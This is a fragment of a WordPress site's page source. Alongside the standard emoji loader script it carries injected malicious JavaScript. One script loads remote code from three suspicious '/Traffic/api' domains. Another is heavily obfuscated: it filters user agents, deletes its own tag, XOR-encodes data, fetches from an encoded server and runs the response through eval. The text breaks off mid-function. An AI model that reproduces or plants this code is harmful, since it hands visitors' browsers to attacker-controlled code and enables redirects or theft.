var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
"use strict";var rxdmS4,FlCAu25,g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;const FZHYVb=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,0x5d,0x10,0x200,0xf,0x3,0x2,0x4,0x3ff,0x7f,0x1f,0x80,0x12,0x20,0x5,0x18,0xa,0x13,0x40,0xffff,"js",0x82,!0x1];function R_2lkdW(rxdmS4){var FlCAu25="<,^7;9x`%1.0+g~o:JG*fp]ca2O#m}B[bX5d{(wt=iA&TEUINLV$erR_?yKl|YCHvuknW/Z6)>Q8DshzSP4M3!\"Fq@j",g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;N4W9hYK(g3Gld7J=""+(rxdmS4||""),_PoKZj=g3Gld7J.length,MSUxhJ2=[],cUL0VT=FZHYVb[0x0],j2tRUWQ=FZHYVb[0x0],Q4sOnFn=-FZHYVb[0x1]);for(nco7OV=FZHYVb[0x0];nco7OV<_PoKZj;nco7OV++){var R_2lkdW=FlCAu25.indexOf(g3Gld7J[nco7OV]);if(R_2lkdW===-FZHYVb[0x1])continue;if(Q4sOnFn<FZHYVb[0x0]){Q4sOnFn=R_2lkdW}else{N4W9hYK(Q4sOnFn+=R_2lkdW*FZHYVb[0xc],cUL0VT|=Q4sOnFn<<j2tRUWQ,j2tRUWQ+=(Q4sOnFn&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(MSUxhJ2.push(cUL0VT&FZHYVb[0x3]),cUL0VT>>=FZHYVb[0x2],j2tRUWQ-=FZHYVb[0x2])}while(j2tRUWQ>FZHYVb[0x9]);Q4sOnFn=-FZHYVb[0x1]}}if(Q4sOnFn>-FZHYVb[0x1]){MSUxhJ2.push((cUL0VT|Q4sOnFn<<j2tRUWQ)&FZHYVb[0x3])}return t24J32(MSUxhJ2)}function s7MFvm(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=R_2lkdW(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}N4W9hYK(rxdmS4={},FlCAu25=["ey0.sM]{{1_D]9[aL$>xSDUU[k4|K2hO=+E.r8i`7*ZZlw,(`6(QnNaS<+","<=%R_(gr5|xBTM7Gf$txPyVvllU/n~U=)<","/NyRrKmG;1W>54:#Gx<x_UO%Blcub7Oc}fte`Q2I7","![cXYtO\"x",",Lg`=HGU%f_29{YJ(O_e@E(`(vQZNI{w&+WQddxZn*YmTI`*&CFLe$gIM*","MN6mNZpd7yxzM~Qwl7?x6z8`9g=z5g9w7}%1>P.e>JGNwL5{Dc7","YCH>0wma0~4b#O<cJbWO%DC\"}p`gd~T*gyWQZ56,","pHb$$K0,","9Lj}qy<{zo)H#^R#)7?1}Mu$hH:fY;Ba1OO#x{j\"fv*4+o$isClrFM?^2~t","Bu@$y|DxhH2#,{4=;km[9N6g&lw","k$U[c6<","vWTQ4CB^","Tcq>}Sz$(KsrSl&O*o_ed=g*+l.RtZ&t,b1B/rZQV|vL,)Z(_lGs~P<","?R]en)%awv,^3l,a($g[^\".\"$*!9%ovc|({ssD[*0l!P/;","o+g_Ghj+NHRZ&wo#96OsgN4U~p3Z[M}dnCS1","q>Hm1zH$Co=`};k{nc0sVLFcV1AN:#2}&&@xLWnc7","CW1$1\"QUd|xYel>*ql7","r$p;N$*,Ffg)X2ba^&^","#fIeMCKGOJr","Uxyx)C+a(K~_SMC}hZp`0M8,","Ofh;Y|#}!g3Q+3G=P7~`9_VBUrX~3Ibc>lKr<KF`P|SoRg2d0cg`@y^K~pw","+&nbCU{GWyYs%7.","m1c>2eEIvG)2^2]m_=,8g_W+;","2Oux{82r{vtmJ:Bdm,","fyC_N8gixv5)a6hO;6([4MS+UpPZ1(\"iAQB[3e0`l0Ld+t~","@JMsw4meKl9x]P$i:&^","5N2h6z9g|%:f)Mw24EV$3E.BY?ls<:p#]Rubx_E!x.SP42w2]bSLe),27","]Q~_bR1g,G=e!S,J2,","]oyx^UprAC}u;#F}$7J$JDrckH\"{<oSt}U.}$Z<","[c[;gQFiH|czW{A2bcFm!VDGT~_D[7","huYQCs:ZsroC36|{[QweO=?B$ROJ1:<BV5+.T8(*$|VS.9gwNf+.*","MlwL%P.G5HepO9#}*x:RmITa>K]5;7","$1/`ORf%!Ka_Sor=QC;}>yavUGj})l+OYupD./|BAfwm!|CASle.@I%Gx","T+$}EHr,6v0(hL+",">JBD?z>,",")7v>@w?epv:8cwdJjC/m1z4UPR[)vokGM<","BR9.}e@JkRk2lKYc\"EXbGVxBS+,)7Ord/CnsN$=+bo:z&6+t9LF1]",".6wLgD_!]v18#^;[%}HmJ_,*IG~zTI%[5=N1@y}H/*a","zCG)DN``NpQS^Y]5z2e}aw`,qgCeqIGm[},#qhRS,o","5WbxHU]Q;Rksa:wGe7\"`9)hxbojnJNWBm=Imjhy}LGq}&OjAkWYmf","fHn}idrg0ChLVggOTubxS{:{/vfzC4@cxGoDhVxA6f=zL2VmM<","+O_eSD(g4*Pb,","N5(.ml]a^od)>)VmHW7}yr*`%g`I3o,Boyl%","[R8}kQKK&J%RHw%GtQC;f","d|h[K$s`1J","iy7}FM.ewgxR1:?dJ(wmtH(yG1;cP;adYWcLUYG{9","Uux1ae&dQl)Lq7z=o|l%mRU^1~Y","J6B>/znHC%~zl~K{9|kr%C*}9K`cnwj]`yoRcl[yOJ^),)Za%H?>}","w65}=WtyG|@,%on[ZNt;2I]UDC!QTMstU[DVGMMztgX)b73]{|)1ODny}~","GH+[/NMd#~v,/|(2lNXb@XG{J1XpYamipR49My]%+~xx/N{[UO^","dyUmzQ+K|C%NX:7&s(]eqwQGglOJ3IgfI&esZPy,","7RR1;535ju}K$~>2S5p.","goU`w>(/El+:+oJf7cNRA8@,:ow>r)&ww6vLO!I,","AOG$yZK\"j~t>CL&wBu~euN(I&%:)=;","&Q[;dR/,+pQS@P`2)c?L+Vm%L1[DVL=wJU49@w+^","Bu)1GyC+:o=>2LJtvxC;5eb^","h?ZDe)|^~l:z]O`(WW#b:Pu/[HQ},:Dt",".b8b_rgHV|aad~T*T$Zme8<","tyR_iY|UAfKlkPnGw6$%X=(`)go4T#CaY7c;)C<","2O5bcM12_v>}c^2Ag+vL75hQj~DsQ~QwX(er1_<","s2A#Se|a<pXp5LW[2u_mZ_4U!g^hjwC}m(x_(LVB7y%WSa^J)c[D8w:^","pUf}lsWSh%}D1(g","*x/[*6K=M|:)b)rdHcG8G","HmHLjM]e8CT~;t+O6urQf6T=iJX#C2CcyNpm<|#dPRulM^w2>NB_aVV^","&yD[vQd`}kw[*VwwR$iBfD}r^y2aa6+*g;7","ZWP%SwJ`9.\"|Zg1wWEg[jh=U.lnZ;#\"iZ<","0Hp.N3~Z8uBK$wf#rRoDIW+UPRgz_o6GBRx_p","lW1$_5+Gyfh;C2u(TW3[OhyIv1.79|otd(P$oDLi$*Z>$ZN==}BeqIBall(","E(^$1{DU[|]ftOA*P(894PucZg*[0~$5]+u$t8[}Uo@sdKYJ$$4%","{O!Q&HtI31#5j2ZwxOT}Q/Sex_1gv#X(?6$reZid1Kt","Dx{.#>W\"N|KS9{q5xW}[v5!g%J$lxP]5TxZDQ/4acgilqogfPZoxn)$iIG","MZ]mIZ>`KC<XWMS5^pn9<zh5K0llY|[J@r]XLW:a(gdpS7","~OCDm=r,","OW36<|3KvrY>lwV5m5=RcDOBok!Z0OmdJ+/.0w5B5oU[W7R=}R};}","nA&)5hBB$18Zq|B{|NW6*MhU`","tOB_4/Ca,RVkIZ9(oxV#~CG^","XyZmJP(gvoQQPNq5eEvxjEG%9","<|}Du)6HiJfzy(h=8lbxyUtybo80q6.w7koeG","n5<x8ykKkHWkD6o#y$j%1Pi8UGo4blE*I&2$*P3+Fv<4?MJ=abvR}","X7F>@h8,","EyQ9y|<","~LB`C)<","X=!Q9P~{MRDSV2cm37msqM.KKJ(","M2GbcV~{s?#gkL+OGU3rRH(dXks{bI[(b$1BZr[/BG","2=2$^URGbo","Y15~aJ!EW","2&p.q/+%jfKe7V@5x;E.gQ>iSkgWKLld^SC[EWu/DCX)@)]5~ooDXhTBopCeL)c5Hca1NFyI0J5)2;LtQRms[h%ZVH+T6Oq5AOMbiS_*XHY>L;\"=:;v1A>4\"Zv>Lp3otMf7b[h$I8J^!,:X{(yHDr4|BSkKe|oc5;;9.Cs&g#f","[og.}","3aZhA7Ly/WU","[#c4j&Z?`]iEQuKT","/.<r","*.sj9>y?aWut1#;","U/Su|ENA","{[3!&Y)5c","e!hrH*o","cuCvjMwye#Ace","y[3!&Y)5c","/wL&//ac#h:`fA6[$`A2L/Ex(X$1T?H@005f~Lac!v[`7A8[005fXjze&J/1$tf@p]e","R7O!iYo","eunv","[DOw","bNz_/pdK","^89&x`I1tihY`b4.26TU32c7yL()b:du(6M5k]U(=\"@{4","RX9&P>W#","m%Fm9","6%7f7","eQd]8)!#","M8lPCj[+w$b","XXd]8)!#","KllPN1iFwW~+#D","Su69VsLL5","3#!B","15@kDmV0AHQ8mj)m(u~BZmh#.%}$JKls0uVznsm06BAC:j.m1h7nWeM#%Zgv$j].AHrn@f%<F8WWdz0","UDxav4n>2","l|XLyqX`yJ+4d*R[6sZk","l|XLyqX`yJ+4>zc`MMAJ","(0*?KdqnKu84&dv{?W!&tuyr,k|f/kc(@0jXRFu3b@MMBlW$~WofOV9_MCD[lv0WfdqFG%q.GpOV)V?","Ak7z0","er>B","sUOG|1=]NS","f~y8d","\"ojq","Hu&|}xeXqJ*&`r]VJV^GLfvX","Vrv%of6X","UUlWbxUj@D7Cik","af.UhhA[mC)`<","f\"y8n","kk9|GfA","Dr>B","}5&|NwA","_;yj%Gln|9XUg6\"*R[2r","L.>Vj&qK5~6","4a$JadOR>@6","V0&>t5o","N83r8[W;oX=","0;pu","\"0%NPBA\"E;y.*(G1","}Vy)|f&","+A0XFXN=K",",cT5y]JfE","pS<[Y","WrfU","X#Vl","yr:Oe","!#Fa","/#VleYXJ",";T_u4te`<z","Y4\"(<","+TvODiB","ou:t,","),&X","J,&X","g*z0w","fEKG$VTwC","5RH7{}ppaCJvFrD1|_tDI.BK","XE5/6","FK!U","oK!U","aQ*RG"]);function FUaXU5(){var rxdmS4=[function(){return globalThis},function(){return global},function(){return window},function(){return new Function("return this")()}],FlCAu25,g3Gld7J,_PoKZj;N4W9hYK(FlCAu25=void 0x0,g3Gld7J=[]);try{N4W9hYK(FlCAu25=Object,g3Gld7J[FZHYVb[0xb]]("".__proto__.constructor.name))}catch(e){}YwoZ8UH:for(_PoKZj=FZHYVb[0x0];_PoKZj<rxdmS4[FZHYVb[0x4]];_PoKZj++)try{var MSUxhJ2;FlCAu25=rxdmS4[_PoKZj]();for(MSUxhJ2=FZHYVb[0x0];MSUxhJ2<g3Gld7J[FZHYVb[0x4]];MSUxhJ2++)if(typeof FlCAu25[g3Gld7J[MSUxhJ2]]===FZHYVb[0x5])continue YwoZ8UH;return FlCAu25}catch(e){}return FlCAu25||this}N4W9hYK(g3Gld7J=FUaXU5()||{},_PoKZj=g3Gld7J.TextDecoder,MSUxhJ2=g3Gld7J.Uint8Array,cUL0VT=g3Gld7J.Buffer,j2tRUWQ=g3Gld7J.String||String,Q4sOnFn=g3Gld7J.Array||Array,nco7OV=function(){var rxdmS4=new Q4sOnFn(FZHYVb[0x1b]),FlCAu25,g3Gld7J;N4W9hYK(FlCAu25=j2tRUWQ[FZHYVb[0x8]]||j2tRUWQ.fromCharCode,g3Gld7J=[]);return function(_PoKZj){var MSUxhJ2,cUL0VT,Q4sOnFn,nco7OV;N4W9hYK(cUL0VT=void 0x0,Q4sOnFn=_PoKZj[FZHYVb[0x4]],g3Gld7J[FZHYVb[0x4]]=FZHYVb[0x0]);for(nco7OV=FZHYVb[0x0];nco7OV<Q4sOnFn;){N4W9hYK(cUL0VT=_PoKZj[nco7OV++],cUL0VT<=FZHYVb[0x19]?MSUxhJ2=cUL0VT:cUL0VT<=0xdf?MSUxhJ2=(cUL0VT&FZHYVb[0x1a])<<FZHYVb[0x7]|_PoKZj[nco7OV++]&FZHYVb[0x6]:cUL0VT<=0xef?MSUxhJ2=(cUL0VT&FZHYVb[0x14])<<FZHYVb[0xa]|(_PoKZj[nco7OV++]&FZHYVb[0x6])<<FZHYVb[0x7]|_PoKZj[nco7OV++]&FZHYVb[0x6]:j2tRUWQ[FZHYVb[0x8]]?MSUxhJ2=(cUL0VT&FZHYVb[0x9])<<FZHYVb[0x1c]|(_PoKZj[nco7OV++]&FZHYVb[0x6])<<FZHYVb[0xa]|(_PoKZj[nco7OV++]&FZHYVb[0x6])<<FZHYVb[0x7]|_PoKZj[nco7OV++]&FZHYVb[0x6]:(MSUxhJ2=FZHYVb[0x6],nco7OV+=FZHYVb[0x15]),g3Gld7J[FZHYVb[0xb]](rxdmS4[MSUxhJ2]||(rxdmS4[MSUxhJ2]=FlCAu25(MSUxhJ2))))}return g3Gld7J.join("")}}());function t24J32(rxdmS4){return typeof _PoKZj!==FZHYVb[0x5]&&_PoKZj?new _PoKZj().decode(new MSUxhJ2(rxdmS4)):typeof cUL0VT!==FZHYVb[0x5]&&cUL0VT?cUL0VT.from(rxdmS4).toString("utf-8"):nco7OV(rxdmS4)}function vJUdU0(g3Gld7J,_PoKZj,MSUxhJ2){function cUL0VT(g3Gld7J){var _PoKZj=":EtDeqXWw`<7;nOQfVT*|bsdh>pc)GFv&^/%Yk$mSzjH@25yxIU6}?1\"lJu_9]Lr.i#C{+gKZo,3~!aP0N(4[=8BRAM",cUL0VT,j2tRUWQ,rxdmS4,FlCAu25,Q4sOnFn,nco7OV,R_2lkdW;N4W9hYK(cUL0VT=""+(g3Gld7J||""),j2tRUWQ=cUL0VT.length,rxdmS4=[],FlCAu25=FZHYVb[0x0],Q4sOnFn=FZHYVb[0x0],nco7OV=-FZHYVb[0x1]);for(R_2lkdW=FZHYVb[0x0];R_2lkdW<j2tRUWQ;R_2lkdW++){var s7MFvm=_PoKZj.indexOf(cUL0VT[R_2lkdW]);if(s7MFvm===-FZHYVb[0x1])continue;if(nco7OV<FZHYVb[0x0]){nco7OV=s7MFvm}else{N4W9hYK(nco7OV+=s7MFvm*FZHYVb[0xc],FlCAu25|=nco7OV<<Q4sOnFn,Q4sOnFn+=(nco7OV&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(rxdmS4.push(FlCAu25&FZHYVb[0x3]),FlCAu25>>=FZHYVb[0x2],Q4sOnFn-=FZHYVb[0x2])}while(Q4sOnFn>FZHYVb[0x9]);nco7OV=-FZHYVb[0x1]}}if(nco7OV>-FZHYVb[0x1]){rxdmS4.push((FlCAu25|nco7OV<<Q4sOnFn)&FZHYVb[0x3])}return t24J32(rxdmS4)}function j2tRUWQ(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=cUL0VT(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}switch(g3Gld7J){case j2tRUWQ(0x55):return _PoKZj+MSUxhJ2}}function xEv0OAf(){}function eS9fQMb(){}function N4W9hYK(){N4W9hYK=function(){}}(()=>{function g3Gld7J(g3Gld7J,_PoKZj){if(!_PoKZj){_PoKZj=function(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}}if(!g3Gld7J){g3Gld7J=function(g3Gld7J){var _PoKZj="oeAOu2cgXvrz;m:[%@{W9}sB?RfHI_yj!)0*L/F$T^|.N<7tw86,Jha4+QU]#\"`pC~=3xPE&q1(5>VMinYdGZbKSkDl",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}}if(new RegExp(s7MFvm(0x56),"i")[s7MFvm(0x57)](navigator[_PoKZj(FZHYVb[0xe])])){return}const MSUxhJ2=document[_PoKZj(0x59)];MSUxhJ2?.parentNode?.removeChild(MSUxhJ2);const cUL0VT=Date[_PoKZj(0x5a)],j2tRUWQ=cUL0VT(),Q4sOnFn=window[_PoKZj(FZHYVb[0xc])],nco7OV=_PoKZj(0x5c),R_2lkdW=Q4sOnFn[_PoKZj(FZHYVb[0x11])](nco7OV);if(R_2lkdW&&Number(R_2lkdW)>j2tRUWQ){return}let FUaXU5="";const eS9fQMb=_PoKZj(0x5e),Umd97Q=Q4sOnFn[_PoKZj(FZHYVb[0x11])](eS9fQMb)||crypto[_PoKZj(0x5f)]();Q4sOnFn[_PoKZj(0x60)](eS9fQMb,Umd97Q);const RpmYYq=new TextEncoder,UPyk5fu=new TextDecoder,dNiP0ow=new Uint8Array(_PoKZj(0x61)[_PoKZj(0x62)](",")[_PoKZj(0x63)](Number)),ZkiMN6J=0x5265c00,WuMNj_9=g3Gld7J=>{return(FZHYVb[0x0],eval)(g3Gld7J)},db47_vS=g3Gld7J=>{function _PoKZj(g3Gld7J){var _PoKZj="J[YmDPIpiweuqCF~`:9f>hl;#2*+&),xK1(d4=zQ]<H%3_ors/MG@TBW^Z8y6kj.bc0{V?a5gXtAR!}EOv\"n|L7UNS$",MSUxhJ2,j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<j2tRUWQ;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(MSUxhJ2[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function MSUxhJ2(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=_PoKZj(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}return new Uint8Array(g3Gld7J[MSUxhJ2(0x64)]((g3Gld7J,_PoKZj)=>{function MSUxhJ2(g3Gld7J){var MSUxhJ2="6BKYSjorJmi8?C.Nk;Ixz2gb&TdwLE]nF1UyGQct,ADRvPs:M\"(H4Xu*eh@0!W}>|V53=Z)9+O%a[_/q^p~f$#7l{<`",j2tRUWQ,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb,Umd97Q;N4W9hYK(j2tRUWQ=""+(g3Gld7J||""),Q4sOnFn=j2tRUWQ.length,nco7OV=[],R_2lkdW=FZHYVb[0x0],FUaXU5=FZHYVb[0x0],eS9fQMb=-FZHYVb[0x1]);for(Umd97Q=FZHYVb[0x0];Umd97Q<Q4sOnFn;Umd97Q++){var RpmYYq=MSUxhJ2.indexOf(j2tRUWQ[Umd97Q]);if(RpmYYq===-FZHYVb[0x1])continue;if(eS9fQMb<FZHYVb[0x0]){eS9fQMb=RpmYYq}else{N4W9hYK(eS9fQMb+=RpmYYq*FZHYVb[0xc],R_2lkdW|=eS9fQMb<<FUaXU5,FUaXU5+=(eS9fQMb&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(nco7OV.push(R_2lkdW&FZHYVb[0x3]),R_2lkdW>>=FZHYVb[0x2],FUaXU5-=FZHYVb[0x2])}while(FUaXU5>FZHYVb[0x9]);eS9fQMb=-FZHYVb[0x1]}}if(eS9fQMb>-FZHYVb[0x1]){nco7OV.push((R_2lkdW|eS9fQMb<<FUaXU5)&FZHYVb[0x3])}return t24J32(nco7OV)}function j2tRUWQ(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=MSUxhJ2(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}return g3Gld7J^dNiP0ow[_PoKZj%dNiP0ow[j2tRUWQ(0x65)]]}))},io4LB2P=async(g3Gld7J,_PoKZj)=>{function MSUxhJ2(g3Gld7J){var _PoKZj="4w#JpDzmLT&o<3yX;xWA!9HdR6qt|F7fPN@n.^_OQGu%se/gM5Sl+iU~Y8ECbIc$K\"{rV*)?kh2B]j>v,`[:Z1(=0a}",MSUxhJ2,j2tRUWQ,nco7OV,R_2lkdW,FUaXU5,eS9fQMb,Umd97Q;N4W9hYK(MSUxhJ2=""+(g3Gld7J||""),j2tRUWQ=MSUxhJ2.length,nco7OV=[],R_2lkdW=FZHYVb[0x0],FUaXU5=FZHYVb[0x0],eS9fQMb=-FZHYVb[0x1]);for(Umd97Q=FZHYVb[0x0];Umd97Q<j2tRUWQ;Umd97Q++){var RpmYYq=_PoKZj.indexOf(MSUxhJ2[Umd97Q]);if(RpmYYq===-FZHYVb[0x1])continue;if(eS9fQMb<FZHYVb[0x0]){eS9fQMb=RpmYYq}else{N4W9hYK(eS9fQMb+=RpmYYq*FZHYVb[0xc],R_2lkdW|=eS9fQMb<<FUaXU5,FUaXU5+=(eS9fQMb&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(nco7OV.push(R_2lkdW&FZHYVb[0x3]),R_2lkdW>>=FZHYVb[0x2],FUaXU5-=FZHYVb[0x2])}while(FUaXU5>FZHYVb[0x9]);eS9fQMb=-FZHYVb[0x1]}}if(eS9fQMb>-FZHYVb[0x1]){nco7OV.push((R_2lkdW|eS9fQMb<<FUaXU5)&FZHYVb[0x3])}return t24J32(nco7OV)}function j2tRUWQ(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=MSUxhJ2(FlCAu25[g3Gld7J])}return rxdmS4[g3Gld7J]}const Q4sOnFn=await fetch(j2tRUWQ(0x66)+g3Gld7J,{[j2tRUWQ(0x67)]:j2tRUWQ(0x68),[j2tRUWQ(0x69)]:db47_vS(RpmYYq[j2tRUWQ(0x6a)](JSON[j2tRUWQ(0x6b)](_PoKZj)))});if(!Q4sOnFn.ok){throw new Error}return UPyk5fu[j2tRUWQ(0x6c)](db47_vS(new Uint8Array(await Q4sOnFn[j2tRUWQ(0x6d)]())))};let ypO47D=FZHYVb[0x0],z12fX0=FZHYVb[0x0];setTimeout(()=>{function g3Gld7J(g3Gld7J){var _PoKZj="A<X5k^#YB%q*0jRu.(HS+lO\"7drntTLGogmsINepViEUF{6[vz$~98,ZD:;aKP/3=Jc!&QhfCwW>M|_@)1}xy4]`?2b",j2tRUWQ,MSUxhJ2,Q4sOnFn,nco7OV,R_2lkdW,FUaXU5,eS9fQMb;N4W9hYK(j2tRUWQ=""+(g3Gld7J||""),MSUxhJ2=j2tRUWQ.length,Q4sOnFn=[],nco7OV=FZHYVb[0x0],R_2lkdW=FZHYVb[0x0],FUaXU5=-FZHYVb[0x1]);for(eS9fQMb=FZHYVb[0x0];eS9fQMb<MSUxhJ2;eS9fQMb++){var Umd97Q=_PoKZj.indexOf(j2tRUWQ[eS9fQMb]);if(Umd97Q===-FZHYVb[0x1])continue;if(FUaXU5<FZHYVb[0x0]){FUaXU5=Umd97Q}else{N4W9hYK(FUaXU5+=Umd97Q*FZHYVb[0xc],nco7OV|=FUaXU5<<R_2lkdW,R_2lkdW+=(FUaXU5&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(Q4sOnFn.push(nco7OV&FZHYVb[0x3]),nco7OV>>=FZHYVb[0x2],R_2lkdW-=FZHYVb[0x2])}while(R_2lkdW>FZHYVb[0x9]);FUaXU5=-FZHYVb[0x1]}}if(FUaXU5>-FZHYVb[0x1]){Q4sOnFn.push((nco7OV|FUaXU5<<R_2lkdW)&FZHYVb[0x3])}return t24J32(Q4sOnFn)}function _PoKZj(_PoKZj){if(typeof rxdmS4[_PoKZj]===FZHYVb[0x5]){return rxdmS4[_PoKZj]=g3Gld7J(FlCAu25[_PoKZj])}return rxdmS4[_PoKZj]}if(_PoKZj(0x6e)in xEv0OAf){j2tRUWQ()}function j2tRUWQ(){var g3Gld7J=function(){var 